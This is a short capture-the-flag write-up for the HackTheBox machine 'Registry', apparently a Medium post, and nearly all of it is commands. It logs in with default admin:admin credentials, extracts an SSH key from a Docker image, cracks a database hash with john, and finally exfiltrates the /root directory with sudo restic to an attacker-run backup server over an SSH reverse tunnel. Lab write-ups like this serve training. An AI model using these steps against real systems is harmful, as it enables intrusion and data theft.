Registry — HackTheBox

About this box:

Recon:

https://gist.github.com/ls4cfk/b3757e015c520b98f49bbf9555cdaea7#file-nmap-txt
sudo vim /etc/hosts

Enumeration

$ gobuster dir -u http://10.10.10.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o ip-enum -t 20
$ gobuster dir -u http://docker.registry.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o vhost-enum -t 20
docker.registry.htb/v2
admin:admin
Docker installation
$ curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
$ echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list$ sudo apt-get update$ sudo apt-get install docker-ce
{ 
“insecure-registries”:[“docker.registry.htb:443”]
}
sudo docker login docker.registry.htb:443
sudo docker pull docker.registry.htb:443/bolt-image:latest
sudo docker run -it docker.registry.htb:443/bolt-image:latest

Get the user

GkOcz221Ftb3ugog
$ chmod 600 id_rsa$ ssh -i id_rsa bolt@10.10.10.159

Get www-data user

/var/www/html/bolt/app/database
$ scp -i id_rsa bolt@10.10.10.159:/var/www/html/bolt/app/database/bolt.db ./
$ john --wordlist=/usr/share/wordlists/rockyou.txt bolt_db_hash

Get www-data shell

sudo apt install restic
restic init --repo /tmp/registry_bak
rest-server --path /tmp/registry_bak --no-auth --listen 0.0.0.0:8002
ssh -i id_rsa -R 8002:127.0.0.1:8002 bolt@10.10.10.159
$ sudo /usr/bin/restic backup -r rest:http://127.0.0.1:8002/ /root/ -p pass
$ restic -r /tmp/registry_bak/ restore latest --target ./registry_restored
https://www.hackthebox.eu/profile/94787

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store